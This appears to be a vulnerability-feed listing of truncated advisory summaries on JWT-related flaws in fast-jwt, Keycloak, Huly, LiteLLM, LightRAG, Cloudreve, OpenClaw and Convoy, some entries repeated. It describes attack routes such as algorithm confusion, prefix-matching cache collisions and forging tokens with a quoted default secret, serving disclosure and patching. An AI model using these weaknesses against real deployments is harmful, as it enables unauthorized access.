CVE-2026-34950 fast-jwt has an incomplete fix for CVE-2023-48223: JWT Algorithm Confusion via Whitespace-Prefixed RSA Public Key

fast-jwt provides fast JSON Web Token JWT implementation. In 6.1.0 and earlier, the publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that CVE-2023-48223 patch...

CVE-2026-34950

CVE-2026-34950 affects the fast-jwt library (6.1.0 and earlier). The publicKeyPemMatcher in fast-jwt/src/crypto.js uses an anchored regex starting with ^, which is defeated by any leading whitespace in the key string. This misclassifies RSA public keys with leading whitespace, allowing an attacke...

CVE-2026-37977

A flaw was found in Keycloak. A remote attacker can exploit a Cross-Origin Resource Sharing CORS header injection vulnerability in Keycloak's User-Managed Access UMA token endpoint. This flaw occurs because the azp claim from a client-supplied JSON Web Token JWT is used to set the...

CVE-2026-5622 hcengineering Huly Platform JWT Token token.ts hard-coded key

A vulnerability was determined in hcengineering Huly Platform 0.7.382. Affected by this issue is some unknown functionality of the file foundations/core/packages/token/src/token.ts of the component JWT Token Handler. This manipulation of the argument SERVERSECRET with the input secret causes use ...

CVE-2026-5622 hcengineering Huly Platform JWT Token token.ts hard-coded key

A vulnerability was determined in hcengineering Huly Platform 0.7.382. Affected by this issue is some unknown functionality of the file foundations/core/packages/token/src/token.ts of the component JWT Token Handler. This manipulation of the argument SERVERSECRET with the input secret causes use ...

PT-2026-30582

Name of the Vulnerable Software and Affected Versions Keycloak affected versions not specified Description A flaw exists in Keycloak that allows a remote attacker to exploit a Cross-Origin Resource Sharing CORS header injection in the User-Managed Access UMA token endpoint. The issue arises becau...

LiteLLM 授权问题漏洞

LiteLLM is an open-source application developed by Berri AI. It allows for the invocation of all LLM APIs in the OpenAI format. Prior to version 1.83.0, LiteLLM had an authorization vulnerability. This vulnerability stemmed from the use of token:20 as a cache key when JWT authentication was...

fast-jwt 安全漏洞

fast-jwt is a JSON Web Token implementation open-sourced by Nearform. Versions of fast-jwt up to 6.1.0 contained security vulnerabilities, which stemmed from the lack of verification of the crit header parameter. This allowed tokens containing unknown extensions to be accepted...

GuvenliWebYazilimiGelistirme-CipherNone-

🛡️ CipherNone: JWT "alg: none" Vulnerability & Hardening Lab...

JWT-PHANTOM

No d...

Authentication Bypass

litellm is vulnerable to Authentication Bypass. The vulnerability is due to weak cache key generation using only the first 20 characters of JWT tokens, which allows an attacker to craft a token with a matching prefix and gain unauthorized access by inheriting another user’s identity...

PT-2026-30318

Summary: The file lightrag/api/config.py line 397 uses a default JWT secret "lightrag-jwt-default-secret" when the TOKEN SECRET environment variable is not set. The AuthHandler in lightrag/api/auth.py lines 24-25 uses this secret to sign and verify tokens. An unauthenticated attacker can forge...

LiteLLM: Authentication bypass via OIDC userinfo cache key collision

Impact When JWT authentication is enabled enablejwtauth: true, the OIDC userinfo cache uses token:20 as the cache key. JWT headers produced by the same signing algorithm generate identical first 20 characters. This configuration option is not enabled by default. Most instances are not affected. A...

CVE-2026-25726

Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand seeded with time.Now.UnixNano to generate critical security secrets, including the secretkey, and hashidsalt. These secrets are generated...

Denial of Service (DoS)

Overview openclaw is a 🦞 OpenClaw — Personal AI Assistant Affected versions of this package are vulnerable to Denial of Service DoS via the MS Teams webhook process. An attacker can cause resource exhaustion by sending unauthenticated requests that are parsed before proper JWT validation. Details...

Denial of Service (DoS)

Overview @openclaw/msteams is an OpenClaw Microsoft Teams channel plugin Affected versions of this package are vulnerable to Denial of Service DoS via the MS Teams webhook process. An attacker can cause resource exhaustion by sending unauthenticated requests that are parsed before proper JWT...

OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion

Summary MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the...

PT-2026-30279

Name of the Vulnerable Software and Affected Versions LiteLLM versions prior to 1.83.0 Description A critical authentication bypass can occur in LiteLLM when JWT authentication is enabled, due to an OIDC userinfo cache key collision. The OIDC userinfo cache uses the first 20 characters of the tok...

Cloudreve 安全特征问题漏洞

Cloudreve is an open-source public cloud file system that supports multiple cloud storage drivers. Versions of Cloudreve prior to 4.13.0 have a security feature vulnerability. This vulnerability stems from the use of a weak pseudo-random number generator for generating security keys, which may le...

CVE-2026-33746

Convoy is a KVM server management panel for hosting businesses. From version 3.9.0-beta to before version 4.5.1, the JWTService::decode method did not verify the cryptographic signature of JWT tokens. While the method configured a symmetric HMAC-SHA256 signer via lcobucci/jwt, it only validated...